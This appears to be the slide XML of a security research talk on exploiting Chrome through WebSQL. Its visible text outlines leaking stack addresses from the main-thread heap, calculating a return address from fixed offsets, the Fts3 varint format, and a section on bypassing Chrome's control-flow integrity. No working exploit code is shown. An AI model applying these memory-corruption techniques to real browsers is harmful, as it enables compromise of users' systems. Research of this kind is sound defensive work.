              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="2239345"/>
            <a:ext cx="10466614"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The main thread heap grows right behind the Chrome image</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="3142003"/>
            <a:ext cx="10466614"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Several main thread stack addresses are sprinkled in the main thread heap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="4081985"/>
            <a:ext cx="10466614"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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addresses are sprinkled in the main thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="5003305"/>
            <a:ext cx="10466614"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From a leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stack address, calculate the return address</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498878996"/>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a:xfrm>
            <a:off x="762003" y="2692401"/>
            <a:ext cx="3477485" cy="3357414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171176" y="3553154"/>
            <a:ext cx="2762252" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C0 D4 39 DA FF 7F 00 00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867389" y="4327871"/>
            <a:ext cx="3316683" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leak this value from the Chrome Main Thread heap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a Chrome Main Thread stack variable’s address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2697018" y="3910180"/>
            <a:ext cx="1" cy="436163"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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4833638" y="876801"/>
            <a:ext cx="2315217" cy="517301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TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513474" y="867566"/>
            <a:ext cx="2315217" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome Main Stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762003" y="867566"/>
            <a:ext cx="3477485" cy="1824835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solid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TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455688" y="2692401"/>
            <a:ext cx="3026417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome Main Thread Heap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455689" y="858330"/>
            <a:ext cx="2315217" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome Executable</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833637" y="1964712"/>
            <a:ext cx="2315217" cy="38132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TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113478" y="1650928"/>
            <a:ext cx="1755534" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FFFDA39D4C0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377499" y="858330"/>
            <a:ext cx="2315217" cy="517301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TextBox 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057335" y="849095"/>
            <a:ext cx="1871756" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377498" y="2906821"/>
            <a:ext cx="2315217" cy="38132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TextBox 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8657338" y="2607059"/>
            <a:ext cx="1755534" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FAEF6AE1A28</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833637" y="4795658"/>
            <a:ext cx="2315217" cy="38132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TextBox 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965694" y="4792401"/>
            <a:ext cx="2053947" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FAEF6AE1A28</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113478" y="4483177"/>
            <a:ext cx="1755534" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FFFDA39BD58</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Rectangle 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377498" y="4442133"/>
            <a:ext cx="2315217" cy="38132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TextBox 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8657338" y="4133758"/>
            <a:ext cx="1755534" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FAEF6AE1068</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377497" y="4438859"/>
            <a:ext cx="2315217" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 4" descr="mario star iconì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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1230" y="4870125"/>
            <a:ext cx="447750" cy="447750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Right Brace 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148854" y="1958705"/>
            <a:ext cx="212528" cy="2832249"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">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36" name="Right Brace 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10692714" y="2914835"/>
            <a:ext cx="206188" cy="1524023"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">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71" name="TextBox 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10827880" y="3522957"/>
            <a:ext cx="886912" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x9C0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387926" y="785091"/>
            <a:ext cx="11185237" cy="53570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9" name="Curved Connector 68"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="3"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3933428" y="2155373"/>
            <a:ext cx="900209" cy="1567058"/>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74" name="Curved Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="3"/>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7148854" y="3097482"/>
            <a:ext cx="1228644" cy="1888837"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 71801"/>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70" name="TextBox 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757544" y="3211002"/>
            <a:ext cx="2053947" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x1768</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320682851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Fts3 Variable Length Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3281200"/>
            <a:ext cx="10515600" cy="1458751"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469363" y="4553331"/>
            <a:ext cx="3461657" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Decimal</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="485667888"/>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951304" y="2269866"/>
            <a:ext cx="5175380" cy="2698926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chrome’s CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
